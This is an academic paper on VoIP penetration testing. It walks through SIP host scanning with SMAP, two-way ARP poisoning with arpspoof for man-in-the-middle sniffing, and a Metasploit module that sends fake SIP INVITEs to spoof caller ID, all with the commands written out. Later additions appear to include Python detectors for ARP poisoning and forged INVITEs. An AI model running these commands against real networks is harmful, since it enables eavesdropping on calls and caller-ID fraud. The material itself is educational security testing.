
International Journal of Scientific Research Engineering & Technology (IJSRET)

Volume 2 Issue 6 pp 345-347 September 2013 www.ijsret.org ISSN 2278 0882

Performance analysis of VOIP technology on the ground of penetration testing


Laxman Vishnoi, M.Tech (I.T.), I.T.M. College, Bhilwara (Rajasthan)
Mohammad Ishak Tank, M.Tech (C.S.), Pacific University, Udaipur (Rajasthan)

Abstract- VoIP is a technology that offers many benefits and cost-effective methods for better communication. Nowadays, more and more small businesses and enterprises are replacing their conventional PSTN systems with IP-based ones. A VoIP-based PBX can provide many features, such as multiple extensions, caller ID, voice mail, IVR capabilities, recording, logging, and use with either hardware-based or software-based telephones. There are many vendors of PBXs, IP telephones, VoIP services and equipment on the market, such as CISCO, AVAYA, ASTERISK, SNOM and THOMSON. With the evolution of technology comes a new challenge for both the defensive and offensive sides of security. One of the great disadvantages of traditional phone communication was that it was prone to eavesdropping, which could be achieved by physically connecting a small transmitter, either inside or outside the premises, somewhere along the phone cord. In this paper we cover the following attack vectors: a scanning phase, a sniffing phase and finally a spoofing demo.

Keywords- Penetration Testing, VOIP, Spoofing.

I. INTRODUCTION

When we talk about Web-based applications, few hold more promise than Voice over IP (VOIP). VOIP allows businesses and consumers alike to save an enormous amount of money on their phone bills by making phone calls over the Internet. As great as this technology is, though, it does have its disadvantages. To expose those vulnerabilities we make use of penetration testing. There are several ways of implementing IP-based telephony; some common topologies and usages are shown below:

Self Hosted: A PBX (e.g. Asterisk) is installed at the client site and connected to an ISP or telephony service provider PSTN via a SIP Trunk/PRI; the VoIP traffic flows through a dedicated VLAN.

Hosted Services: Just a switch, a router, IP phones and a connection to the service provider PBX via an internet or IP/VPN connection; each phone is configured with SIP account information. There is no requirement for a PBX on site.

Online SIP Service: Services like sipme.me provide an application for PCs or smartphones with a free SIP account. They offer low prices for international calls as well as free calls between service users, assigning a phone number to each subscriber individually.

The role of SIP (Session Initiation Protocol) is to establish, end or modify a voice or video call, where the voice and/or video traffic is carried by a protocol such as RTP (Real-time Transport Protocol). It is an application layer protocol using UDP for transport (TCP and SCTP can be used as well).

II. SCANNING PHASE

We use SMAP for scanning. Let us see how this is done in practice: SMAP can scan either a single host or a range of IP addresses. We begin with scanning a single host, using the following commands.

    root@bt:/pentest/voip/smap# ./smap
    smap 0.6.0 http:// <webaddress>
    usage: smap [ Options ]
    -h: this help
    -d: increase debugging
    -o: enable fingerprinting
    -O: enable more verbose fingerprinting
    -l: fingerprint learning mode
    -t: TCP transport
    -u: UDP transport (default)
    -P0: Treat all hosts as online - skip host discovery
    -p : destination port
    -r : messages per second rate limit
    -D : SIP domain to use without leading sip:
    -w : timeout in msec

    root@bt:/pentest/voip/smap# ./smap 192.168.1.128
    smap 0.6.0 http://www.websitename.net/
    192.168.1.128: ICMP reachable, SIP enabled
    1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Now use the following command to scan a range of IP addresses.

    root@bt:/pentest/voip/smap# ./smap 192.168.1.*
    smap 0.6.0 http:// <webaddress>
    192.168.1.20: ICMP reachable, SIP enabled
    192.168.1.22: ICMP reachable, SIP enabled
    192.168.1.0: ICMP unreachable, SIP disabled
    192.168.1.1: ICMP unreachable, SIP disabled
    192.168.1.2: ICMP unreachable, SIP disabled
    192.168.1.3: ICMP unreachable, SIP disabled
    ----EDIT--
    192.168.1.250: ICMP unreachable, SIP disabled
    192.168.1.251: ICMP unreachable, SIP disabled
    192.168.1.252: ICMP unreachable, SIP disabled
    192.168.1.253: ICMP unreachable, SIP disabled
    192.168.1.254: ICMP unreachable, SIP disabled
    192.168.1.255: ICMP unreachable, SIP disabled
    256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

Now that we have identified the SIP-enabled hosts, we can use SMAP to fingerprint the server/client type and version, as shown in the following commands.

    root@bt:/pentest/voip/smap# ./smap -O 192.168.1.128
    smap 0.6.0 http:// <webaddress>
    192.168.1.128: ICMP reachable, SIP enabled
    best guess (70% sure) fingerprint:
    Asterisk PBX SVN-trunk-r56579
    User-Agent: Asterisk PBX
    1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

IJSRET @ 2013

III. SNIFFING PHASE

Before we begin to sniff traffic we need to ARP poison our switch or gateway. For this purpose we will use a tool called arpspoof, which is located at /usr/sbin/arpspoof in the Backtrack operating system; we can also invoke it from anywhere simply by typing: arpspoof. Before using arpspoof we need to enable IP forwarding using the following syntax:

    root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Arpspoof syntax:

    root@bt:~# arpspoof
    Version: 2.4
    Usage: arpspoof [-i interface] [-t target] host

For a successful MITM attack we need to spoof both ways:

    arpspoof -t victim gateway
    arpspoof -t gateway victim

IV. SPOOFING CALLER ID

The voip/sip_invite_spoof auxiliary module creates a fake SIP INVITE request, making the targeted device ring and display fake caller ID information. The auxiliary options are as follows:

    msf > use voip/sip_invite_spoof
    msf auxiliary(sip_invite_spoof) > show options

    Module options (auxiliary/voip/sip_invite_spoof):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       MSG                       yes       The spoofed caller id to send
       RHOSTS                    yes       The target address range or CIDR identifier
       RPORT    5060             yes       The target port
       SRCADDR  192.168.1.1      yes       The sip address the spoofed call is coming from
       THREADS  1                yes       The number of concurrent threads

    msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
    RHOSTS => 192.168.1.104
    msf auxiliary(sip_invite_spoof) > run
    [*] Sending Fake SIP Invite to: 192.168.1.104
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
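The two-way ARP spoofing described in the sniffing phase leaves a recognisable trace on the wire. The following Python sketch is an added example, not part of the original paper: it parses Ethernet/ARP replies and flags replies that contradict known IP-to-MAC bindings, or a single MAC answering for several IPs. The MAC addresses, the bindings table and the hex frames are constructed sample data, and the second check is a heuristic, since some routers legitimately answer for several addresses.

```python
import struct
from collections import defaultdict

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, frame[22:28].hex(":"), ".".join(map(str, frame[28:32]))

def find_poisoning(frames, known):
    """Flag ARP replies that contradict known IP->MAC bindings, and any MAC
    that answers for several IPs (what two-way spoofing looks like)."""
    alerts, claimed = [], defaultdict(set)
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != 2:      # 2 = ARP reply
            continue
        _, mac, ip = parsed
        claimed[mac].add(ip)
        if ip in known and known[ip] != mac:
            alerts.append(("binding-mismatch", ip, mac))
    for mac, ips in claimed.items():
        if len(ips) > 1:
            alerts.append(("mac-claims-many", tuple(sorted(ips)), mac))
    return alerts

# Constructed sample: known-good bindings for the gateway and one IP phone,
# and three captured ARP replies written out as hex.
KNOWN = {"192.168.1.1": "00:11:22:33:44:01", "192.168.1.104": "00:11:22:33:44:68"}
SAMPLE = [bytes.fromhex(h) for h in (
    # genuine gateway reply to the phone
    "001122334468 001122334401 0806 0001 0800 06 04 0002"
    " 001122334401 c0a80101 001122334468 c0a80168",
    # 02:00:00:00:00:99 answers for the gateway address
    "001122334468 020000000099 0806 0001 0800 06 04 0002"
    " 020000000099 c0a80101 001122334468 c0a80168",
    # the same MAC answers for the phone address
    "001122334401 020000000099 0806 0001 0800 06 04 0002"
    " 020000000099 c0a80168 001122334401 c0a80101",
)]
```

Calling find_poisoning(SAMPLE, KNOWN) reports both forged bindings and the MAC that claims both addresses; on a managed switch the same policy is usually enforced in hardware rather than by a monitor.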
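Because the fake INVITE of the caller ID spoofing section is sent straight to the phone, a receiver or border monitor can compare what the message claims with where it really came from. This added Python example (not from the paper or from Metasploit) parses an INVITE, including compact header names, and reports the displayed caller ID plus any mismatch. The trusted PBX address, the peer addresses and both messages are constructed assumptions, and the Via comparison is a heuristic.

```python
import re

# Assumption: the PBX at 192.168.1.128 is the only host allowed to deliver
# INVITEs to phones on the voice VLAN. All messages below are constructed.
TRUSTED_PROXIES = {"192.168.1.128"}
COMPACT = {"f": "from", "v": "via", "t": "to", "i": "call-id", "m": "contact"}

def parse_headers(raw):
    """Return (method, headers); header names are lower-cased and expanded."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method = head[0].split(" ", 1)[0].upper()
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            key = name.strip().lower()
            headers.setdefault(COMPACT.get(key, key), []).append(value.strip())
    return method, headers

def via_host(via):
    """Host from 'SIP/2.0/UDP host[:port];params', or None."""
    m = re.match(r"SIP/2\.0/\w+\s+([^;:\s]+)", via, re.I)
    return m.group(1).lower() if m else None

def caller_id(from_value):
    """Display name the phone would show, taken from the From header."""
    m = re.match(r'\s*"?([^"<]*?)"?\s*<', from_value)
    return m.group(1) if m else ""

def check_invite(raw, peer_ip):
    """Compare an INVITE's claims with the IP it really arrived from."""
    method, h = parse_headers(raw)
    if method != "INVITE":
        return None
    findings = []
    if peer_ip not in TRUSTED_PROXIES:
        findings.append("invite-from-untrusted-source")
    if via_host(h.get("via", [""])[0]) != peer_ip:
        findings.append("top-via-does-not-match-source")
    return {"caller_id": caller_id(h.get("from", [""])[0]), "findings": findings}

LEGIT = ("INVITE sip:104@192.168.1.104 SIP/2.0\r\n"
         "Via: SIP/2.0/UDP 192.168.1.128:5060;branch=z9hG4bKaaa1\r\n"
         'From: "Reception" <sip:100@192.168.1.128>;tag=1\r\n'
         "To: <sip:104@192.168.1.104>\r\nCSeq: 1 INVITE\r\n\r\n")
FORGED = ("INVITE sip:104@192.168.1.104 SIP/2.0\r\n"     # uses compact headers
          "v: SIP/2.0/UDP 192.168.1.1:5060;branch=z9hG4bKbbb2\r\n"
          'f: "Head Office" <sip:192.168.1.1>;tag=2\r\n'
          "t: <sip:104@192.168.1.104>\r\nCSeq: 1 INVITE\r\n\r\n")
```

The first finding corresponds to a control many IP phones and edge firewalls can enforce directly: accept SIP signalling only from the registrar or proxy.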

V. CONCLUSION AND FUTURE SCOPE

Another issue is that, unlike a traditional phone, a VOIP system (computer or VOIP phone based) is unusable during a power outage. A traditional phone can function even during a power outage because the phone company transmits electricity over the phone line. This electricity is used to power the phone (cordless phones being the exception). So even if the power goes out, the phone will usually still work because the phone's power is coming from a different source. Eavesdropping is the act of secretly listening to the private conversation of others without their permission, as defined by Black's Law Dictionary. VoIP communications software is also vulnerable to electronic eavesdropping via malware infections such as trojans. Caller ID is spoofed through a variety of methods and technologies. The most popular ways of spoofing Caller ID are through the use of VoIP or PRI lines, as discussed in this paper.
